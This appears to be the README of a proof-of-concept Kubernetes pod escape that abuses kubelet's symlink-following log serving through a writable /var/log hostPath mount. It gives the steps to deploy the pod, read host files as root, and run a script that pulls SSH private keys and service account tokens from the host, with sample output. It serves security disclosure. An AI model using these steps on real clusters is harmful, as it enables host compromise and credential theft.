Kube-pod-escape is a POC for an exploit on the symlink following behaviour of logs files serving in the kubelet, in addition with a pod that has a write hostPath mount to /var/log.
This POC shows the outcome of a pod which uses that mount, and how it can escape to the host machine.
Further read on this discovery can be done on the following blog post
A Kubernetes cluster,
Without restriction for retrieving logs with kubectl logs <pod>
First, create the pod by:
$ kubectl create -f escaper.yml
pod "escaper" createdAfter the pod was created, exec into the escaper pod.
$ kubectl exec -it escaper bash
➜ root@escaper:~/exploit$ lsh
Usage: [cath|lsh] <host_path>Works like ls, but using root access on the host machine.
Works like cat, but using root access on the host machine.
Example:
$ kubectl exec -it escaper bash
➜ root@escaper:~/exploit$ lsh /proc
1/
10/
10034/
10042/
10047/
....In addition to the given lsh and cath commands, Inside the ~/exploit folder, there's a python script, which automatically locates and downloads private key files from the host, as well as kubernetes service account tokens.
(to find tokens, the script searches the /var/lib/kubelet/pods folder. this way it can read the mounted .token files for each pod that runs on the host)
$ kubectl exec -it escaper bash
➜ root@escaper:~/exploit$ python find_sensitive_files.py
[*] Got access to kubelet /logs endpoint
[+] creating symlink to host root folder inside /var/log
[*] fetching token files from host
[+] extracted hostfile: /var/lib/kubelet/pods/6d67bed2-abe3-11e9-9888-42010a8e020e/volumes/kubernetes.io~secret/metadata-agent-token-xjfh9/token
[*] fetching private key files from host
[+] extracted hostfile: /home/ubuntu/.ssh/private.key
[+] extracted hostfile: /etc/srv/kubernetes/pki/kubelet.key
...Token Files are downloaded to: /root/exploit/host_files/tokens
Key Files are downloaded to: /root/exploit/host_files/private_keys